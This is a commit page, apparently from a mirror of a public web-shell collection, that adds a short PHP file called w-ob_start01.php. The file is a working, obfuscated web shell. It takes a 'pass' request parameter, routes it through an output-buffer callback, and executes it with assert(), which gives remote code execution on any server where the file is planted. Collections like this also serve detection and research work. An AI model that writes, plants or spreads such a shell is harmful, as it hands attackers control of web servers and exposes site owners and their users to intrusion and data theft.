mirror of
https://github.com/tennc/webshell
synced 2024-11-21 18:53:03 +00:00
add w-ob_start01.php
from : wooyun.org author : isno
This commit is contained in:
parent
777cd7a179
commit
e046b28382
1 changed files with 7 additions and 0 deletions
7
caidao-shell/w-ob_start01.php
Normal file
7
caidao-shell/w-ob_start01.php
Normal file
|
@ -0,0 +1,7 @@
|
|||
<?php
|
||||
$evalstr="";
|
||||
ob_start(function ($c,$d){global $evalstr;$evalstr=$c;});
|
||||
echo $_REQUEST['pass'];
|
||||
ob_end_flush();
|
||||
assert($evalstr);
|
||||
?>
|
Loading…
Reference in a new issue